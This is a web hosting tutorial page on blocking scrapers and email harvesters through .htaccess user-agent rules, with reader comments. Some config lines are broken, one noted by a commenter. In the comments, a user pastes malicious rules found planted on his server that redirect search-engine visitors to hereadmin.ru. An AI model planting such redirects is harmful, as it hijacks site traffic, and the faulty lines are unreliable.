Ratings, reviews, plans and features to help you find the right web hosting provider for your site.

Block Bad robots, spiders, crawlers and harvesters

Web Hosting Articles » A simple guide to .htaccess » Block Bad robots, spiders, crawlers and harvesters



There are lots of examples across the internet that use ModRewrite. We will provide such an examample as well. However, what to do when ModRewrite is not available? We can use SetEnv directive with combination with FilesMatch.

SetEnvIfNoCase user-agent  "^BlackWidow" bad_bot=1
SetEnvIfNoCase user-agent  "^Bot\ mailto:craftbot@yahoo.com" bad_bot=1
SetEnvIfNoCase user-agent  "^ChinaClaw" bad_bot=1
SetEnvIfNoCase user-agent  "^Custo" bad_bot=1
SetEnvIfNoCase user-agent  "^DISCo" bad_bot=1
SetEnvIfNoCase user-agent  "^Download\ Demon" bad_bot=1
SetEnvIfNoCase user-agent  "^eCatch" bad_bot=1
SetEnvIfNoCase user-agent  "^EirGrabber" bad_bot=1
SetEnvIfNoCase user-agent  "^EmailSiphon" bad_bot=1
SetEnvIfNoCase user-agent  "^EmailWolf" bad_bot=1
SetEnvIfNoCase user-agent  "^Express\ WebPictures" bad_bot=1
SetEnvIfNoCase user-agent  "^ExtractorPro" bad_bot=1
SetEnvIfNoCase user-agent  "^EyeNetIE" bad_bot=1
SetEnvIfNoCase user-agent  "^FlashGet" bad_bot=1
SetEnvIfNoCase user-agent  "^GetRight" bad_bot=1
SetEnvIfNoCase user-agent  "^GetWeb!" bad_bot=1
SetEnvIfNoCase user-agent  "^Go!Zilla" bad_bot=1
SetEnvIfNoCase user-agent  "^Go-Ahead-Got-It" bad_bot=1
SetEnvIfNoCase user-agent  "^GrabNet" bad_bot=1
SetEnvIfNoCase user-agent  "^Grafula" bad_bot=1
SetEnvIfNoCase user-agent  "^HMView" bad_bot=1
SetEnvIfNoCase user-agent  “HTTrack” bad_bot=1
SetEnvIfNoCase user-agent  "^Image\ Stripper" bad_bot=1
SetEnvIfNoCase user-agent  "^Image\ Sucker" bad_bot=1
SetEnvIfNoCase user-agent  "Indy\ Library" [NC,OR]
SetEnvIfNoCase user-agent  "^InterGET" bad_bot=1
SetEnvIfNoCase user-agent  "^Internet\ Ninja" bad_bot=1
SetEnvIfNoCase user-agent  "^JetCar" bad_bot=1
SetEnvIfNoCase user-agent  "^JOC\ Web\ Spider" bad_bot=1
SetEnvIfNoCase user-agent  "^larbin" bad_bot=1
SetEnvIfNoCase user-agent  "^LeechFTP" bad_bot=1
SetEnvIfNoCase user-agent  "^Mass\ Downloader" bad_bot=1
SetEnvIfNoCase user-agent  "^MIDown\ tool" bad_bot=1
SetEnvIfNoCase user-agent  "^Mister\ PiX" bad_bot=1
SetEnvIfNoCase user-agent  "^Navroad" bad_bot=1
SetEnvIfNoCase user-agent  "^NearSite" bad_bot=1
SetEnvIfNoCase user-agent  "^NetAnts" bad_bot=1
SetEnvIfNoCase user-agent  "^NetSpider" bad_bot=1
SetEnvIfNoCase user-agent  "^Net\ Vampire" bad_bot=1
SetEnvIfNoCase user-agent  "^NetZIP" bad_bot=1
SetEnvIfNoCase user-agent  "^Octopus" bad_bot=1
SetEnvIfNoCase user-agent  "^Offline\ Explorer" bad_bot=1
SetEnvIfNoCase user-agent  "^Offline\ Navigator" bad_bot=1
SetEnvIfNoCase user-agent  "^PageGrabber" bad_bot=1
SetEnvIfNoCase user-agent  "^Papa\ Foto" bad_bot=1
SetEnvIfNoCase user-agent  "^pavuk" bad_bot=1
SetEnvIfNoCase user-agent  "^pcBrowser" bad_bot=1
SetEnvIfNoCase user-agent  "^RealDownload" bad_bot=1
SetEnvIfNoCase user-agent  "^ReGet" bad_bot=1
SetEnvIfNoCase user-agent  "^SiteSnagger" bad_bot=1
SetEnvIfNoCase user-agent  "^SmartDownload" bad_bot=1
SetEnvIfNoCase user-agent  "^SuperBot" bad_bot=1
SetEnvIfNoCase user-agent  "^SuperHTTP" bad_bot=1
SetEnvIfNoCase user-agent  "^Surfbot" bad_bot=1
SetEnvIfNoCase user-agent  "^tAkeOut" bad_bot=1
SetEnvIfNoCase user-agent  "^Teleport\ Pro" bad_bot=1
SetEnvIfNoCase user-agent  "^VoidEYE" bad_bot=1
SetEnvIfNoCase user-agent  "^Web\ Image\ Collector" bad_bot=1
SetEnvIfNoCase user-agent  "^Web\ Sucker" bad_bot=1
SetEnvIfNoCase user-agent  "^WebAuto" bad_bot=1
SetEnvIfNoCase user-agent  "^WebCopier" bad_bot=1
SetEnvIfNoCase user-agent  "^WebFetch" bad_bot=1
SetEnvIfNoCase user-agent  "^WebGo\ IS" bad_bot=1
SetEnvIfNoCase user-agent  "^WebLeacher" bad_bot=1
SetEnvIfNoCase user-agent  "^WebReaper" bad_bot=1
SetEnvIfNoCase user-agent  "^WebSauger" bad_bot=1
SetEnvIfNoCase user-agent  "^Website\ eXtractor" bad_bot=1
SetEnvIfNoCase user-agent  "^Website\ Quester" bad_bot=1
SetEnvIfNoCase user-agent  "^WebStripper" bad_bot=1
SetEnvIfNoCase user-agent  "^WebWhacker" bad_bot=1
SetEnvIfNoCase user-agent  "^WebZIP" bad_bot=1
SetEnvIfNoCase user-agent  "^Widow" bad_bot=1
SetEnvIfNoCase user-agent  "^WWWOFFLE" bad_bot=1
SetEnvIfNoCase user-agent  "^Xaldon\ WebSpider" bad_bot=1
SetEnvIfNoCase user-agent  "^Zeus" bad_bot=1
<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</FilesMatch>  

How it works? If the string or regular expression matches the user-agent HTTP header it sets the bad_bot environment variable. Then in the FilesMatch we tell the server to deny access (show Forbidden page) to all users/bots that did match any of the strings above.


And of course here it is the ModRewrite based example:

RewriteEngine On 
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]

What it does? The RewriteCond looks for a string or regular expression that matches. In case that there is a match it shows a Forbidden Error page.


  1. How to block users from accessing your site based on their IP address
  2. How to prevent or allow directory listing?
  3. How to change the error documents – 404 Page Not Found, etc
  4. Using .htaccess for password protecting your folders
  5. Using .htaccess to block referrer spam
  6. Disable Hot-Linking of images and other files
  7. Redirect URLs using .htaccess
  8. Introduction to mod_rewrite and some basic examples
  9. Force SSL/https using .htaccess and mod_rewrite
  10. 301 Permanent redirects for parked domain names
  11. Enable CGI, SSI with .htaccess
  12. How to add Mime-Types using .htaccess
  13. Change default directory page
  14. Block Bad robots, spiders, crawlers and harvesters
  15. Make PHP to work in your HTML files with .htacess
  16. Change PHP variables using .htaccess
  17. HTTP Authentication with PHP running as CGI/SuExec
  18. Force www vs non-www to avoid duplicate content on Google
  19. Duplicate content fix index.html vs / (slash only)

Comments 24 >>

Leo Cabral Said,
Aug 04, 2006 @ 12:25

Dude, thanks a lot!

Great list. Saved my life/bandwidth! :D
Just Helping Said,
Dec 03, 2006 @ 01:02

The line ending with "Indy\ Library" [NC,OR] needs a "bad_bot=1" at the end of it.
Fuctweb Said,
Jun 19, 2007 @ 10:42

Great post! Twiceler = GET OFF ME :)
Nox Said,
Jan 18, 2008 @ 05:42

Awesome - Thanks for the Great Posting

Question: What does this entries...
(Mail?)
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]

Why have HTTrack and Indy not the ^ Symbol?
thx
eligio Said,
Jan 18, 2008 @ 10:46

awesome list! already installed on my game site, hope it work. thanks :D
berrada Said,
Aug 07, 2008 @ 09:25

Not really something wonderful, thank you very much
Palestine Students Forum Said,
Oct 20, 2008 @ 14:23

are this helpful for forums
Dmitry Agafonov Said,
Sep 12, 2009 @ 01:41

Be careful, blindly copying the list, you can prevent a lot of perfectly harmless users. For example FlashGet, a download manager and not a bot. I recommend to look at server logs, and find the User-Agent's those robots that are coming to your site, and prevent it to you. So is this approach will be useful in terms of load on the server.
Wondering Said,
Oct 18, 2009 @ 00:34

Where do you put this code? In a robot.txt or on the html page?
Cenk Said,
Oct 21, 2009 @ 03:32

Thanks. Great post!

Wondering:
In .htaccess file on the root directory.
ganool Said,
Jan 24, 2010 @ 08:46

GOD..
thx buddy,,
u save my VPS..

please update it if there is a new bad bot...
because we know that bad bot can change their http_user_agent
ebtsama Said,
Apr 06, 2010 @ 22:24

thanks so mush
Soultrex Said,
May 09, 2010 @ 16:59

Thank to the explanation.
teleport pro Said,
Sep 19, 2010 @ 10:53

After copy/paste the codes to .htaccess in server root i still can use the teleport pro to download all the website contents
enigma1 Said,
Sep 19, 2010 @ 11:30

It's a total waste of time to rely on the user agent header to identify who's the client.

Let aside the fact the various scraping tools customize the user agent for the operator, browsers, firewalls and other installed tools have options for the user to setup the headers anyway he likes.

You cannot rely on client headers to identify something. The only reliable field is the remote ip/port

$ip = $_SERVER['REMOTE_ADDR'];

At best you can validate from the headers the intention of the client whether he wants to enter as a spider or human using the user agent. But that's good only for the popular spiders who carry documented signatures. And even that needs to be cross-references with the IP.
Ashwini - UnicHost Said,
Dec 25, 2010 @ 15:28

I have already implemented that while working on the project.
If anybody wants to go further, can use temporary IP block with multiple requests more than 20/sec or as per your site requirement, within the firewall settings. It helps a lot.
Thanks for sharing.
Ashwini.
Lotto Cheatah Said,
May 22, 2011 @ 11:20

do I need to manually replace the mod_rewrite.c file with the one above for this .htaccess file to work?
James Said,
Aug 19, 2011 @ 15:52

Dude great list. But here I want to mention that there is a website http://foolbots.com with weird concept of passing the bad robots from one website to another website.
Legendofmir Said,
Dec 23, 2011 @ 12:33

I have a huge problem, with Apache on WinXPSP3, all work find but sometime create some .htaccessin all php folder. I want to stop this to make .htaccess files. In what files, and what script must to eneable/disable to stop to create this files.

This script appear in .htaccess:


RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]


I banned this shit site into ZoneAlarm to conect to internet, but i want to disable this option to create this files.
Legendofmir Said,
Dec 24, 2011 @ 02:51

Never maind! I fixed! In httpd.conf from Apache i disabled :

# Satisfy All

Now it's ok!

Marry X-mas to all!!
my top dentist Said,
Jul 15, 2014 @ 09:16

I am preparing my assignment paper and gathering information on this topic. Your post is one of the better that I have read. Thank you for putting this information into one place.
quotes 2014 Said,
Sep 12, 2014 @ 13:25

This subject has interested me for quite some time. I have just started researching it on the Internet and found your post to be informative. Thanks
asus-zenfone-smartphone-android-terbaik Said,
Sep 22, 2014 @ 07:57

Hunt Engine Optimization before SEO is just the proceed of manipulating the pages of your website to ensue with no trouble easy to get to by hunt engine spiders accordingly they can be present with no trouble spidered and indexed. A spider is a robot that explore engines manipulate to ensure millions of web pages same suddenly and classify them by significance. A summon is indexed when it is spidered and deemed suitable subject matter to ensue located in the explore engines results for people to click on.
anonymous Said,
Sep 27, 2014 @ 01:18

This is an excellent resource of information. Always fresh ideas and interesting posts. Thank you so much for all your efforts.
Your comments on this article

(required)

(required but never displayed)



security code



Previous: Change default directory page Next: Make PHP to work in your HTML files with .htacess